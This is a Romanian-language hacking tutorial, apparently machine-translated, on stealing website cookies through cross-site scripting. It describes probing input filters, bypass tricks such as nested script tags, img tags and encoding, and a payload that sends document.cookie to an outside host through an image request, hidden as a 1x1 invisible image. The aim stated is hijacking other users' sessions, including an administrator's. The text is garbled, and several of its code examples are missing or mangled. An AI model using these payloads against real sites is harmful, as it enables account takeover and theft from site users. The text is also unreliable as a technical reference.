Furt de cookie-uri de XSS

XSS acest Css =) Cross Site Scripting

A nu se confunda cu CSS, de asemenea, numit XSS

Ce este un cookie și de ce XSS?

Cookie - este un fișier text simplu pe masina client și este folosit pentru a stoca informații de server.

De exemplu, după ce vă înregistrați și conectați la forum, site-ul salvează informațiile cookie despre tine. Există, de obicei, stoca informații despre

utilizator și parola. Mai târziu, pe forum citește datele și vă definește. Un alt exemplu: sunteți administratorul site-ului, și eu

utilizator simplu. Dar dacă îmi schimb datele mele pe cont propriu, voi, de asemenea, definit de către sistem ca administrator. De aceea,

trebuie să fie în măsură să fure aceste același cookie.

Ce este XSS-atac?

Atacurile XSS - este un atac nu pe site-ul în sine, ci pe utilizatorii site-ului.

XSS - este un defect în aplicarea filtrului.

Există pasive și active XSS XSS.

Pasivă - această XSS, care necesită implicarea directă a victimelor au specifice +

limitări și complexitate. Prin urmare, nu pasivă XSS este extrem de apreciat. De exemplu, trebuie să-i ajunge pentru a merge pe o legătură otrăvitoare

Activ - este XSS, care nu necesită nici o acțiune suplimentară din partea victimei - este suficient

doar deschide pagina cu XSS și codul Java se va executa în mod automat. Datorită automatizării sale - acestea sunt foarte utile și valoroase.

De exemplu, activă CSU există în BB-tag-uri din cauza filtrării insuficiente atunci când lăsați un mesaj pe forumegostevuhechate,

care este întotdeauna activ cu fiecare actualizare.

Cum de a găsi XSS pe acest site?

Încercarea de a insera ori de câte ori este posibil pe o etichetă site-ul (script) de alertă () (/ script). Dacă mesajul din stânga,

apoi încărcați script-ul, și ați găsit XSS.

Luați în considerare un alt XSS „) (script) de alertă () (/ script) Ce se întâmplă în același timp :. Noi

Eticheta de închidere „) (eventual, unele variabile este definit de textul pe care le introducem în matriță) și executat

Cum pentru a determina dacă filtrul este?

Pentru a face acest lucru, toate câmpurile de intrare „; -!“ (Dracu ') =

Apoi, deschideți pagina și căutați cuvântul dracu ', precum și alte personaje:

Dacă () din stânga, este primul semn de vulnerabilitate. Dacă există caractere „“. Este al doilea semn

Dacă nu puteți găsi (), este probabil că au mâncat filtru. Ei bine, în cazul în care acestea au fost înlocuite cu alte caractere, apoi din păcate,

Filtrul funcționează bine.

Ce se întâmplă dacă rândunelele filtru ().

Încercăm să inserați (kdgfjdgfd), uita-te în caz de înghițire - apoi introduceți scriptul de luptă.

Există, de asemenea, modalități de a investi script-ul: (sc (script) ript) alertă () (/ SC (/ script) ript). Acest lucru va ajuta atunci când

filtrul nu este foarte puternic.

Se întâmplă că filtrul contorizează numărul de tag-uri deschise și închise și se închide, atunci acest lucru va ajuta:

De multe ori se întâmplă că filtrul completează script-ul, de exemplu, ca aceasta:

Puteți încerca să utilizați diferite de codificare și încercați pentru a codifica un script.

Trebuie să încercăm prin încercare și eroare.

Trebuie să încercăm să intre valori diferite, uite ce am primit de la filtru. Metoda tykov pentru a înțelege cum funcționează filtrul,

ce defectele sale. Dacă un filtru de rău, este întotdeauna posibil să se introducă script-ul.

De exemplu, numai tag-uri autorizate pot fi utilizate pe site-ul, apoi se ascunde în spatele lor trebuie să ruleze script-ul. De exemplu, această etichetă

img, URL-ul. Ideea este că trebuie să introducem solicitarea noastră în stabilirea img sau URL. Img Avem o mulțime de opțiuni

cu excepția Alt și src, care pot fi utilizate în cartea de oaspeți și forumuri.

Luați în considerare activ XSS

XSS găsit și activ în loc de alertă (), aveți posibilitatea să inserați orice script

În cazul în care filtrul nu este predat pentru a încerca acest lucru:

Pe această pagină a rândul său, această etichetă:

De fapt, alerta () nu va face nimic util (este necesar numai pentru a verifica). Dar script-ul în sine:

El fură deja cookie-uri

Membru supleant-l:

în cazul în care „) (script) img = imagine nouă (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie; script-ul

2) script-ul mai sigure, cum ar, de exemplu:

există deja un apel la fișier care conține My.js

(Script) img = imagine nouă (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie;

Deci, mai sigur.

Uneori, atunci când trebuie să criptați. Aici, de exemplu:

Apoi suna fișierul, de exemplu, 1.jpg și locul de pe site-ul. Reacția este după cum urmează:

În acest moment vom termina linii

documentul nostru de manipulare a sniffer pentru a trimite cookie-ul.

Apropo, spre deosebire de o parte a procesului, această imagine nu este afișată

în formă de cruce, ca acesta are un atribut ascuns (style = afișare: nici unul), iar în caz de dimensiune 1x1. După ce a primit cookie-ul fără a ne

Opțional: dacă vom merge prin IE, script-ul va funcționa, iar dacă în Opera, script-ul nu funcționează și va trece. Și dacă redenumiți html, atunci opera va lucra prea.